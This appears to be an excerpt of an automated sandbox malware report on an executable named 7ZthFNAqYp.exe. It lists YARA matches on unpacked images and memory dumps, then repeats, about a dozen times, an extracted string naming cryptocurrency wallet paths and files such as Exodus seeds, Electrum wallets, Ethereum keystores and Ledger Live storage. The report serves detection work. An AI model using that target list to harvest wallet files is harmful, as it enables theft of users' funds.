Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
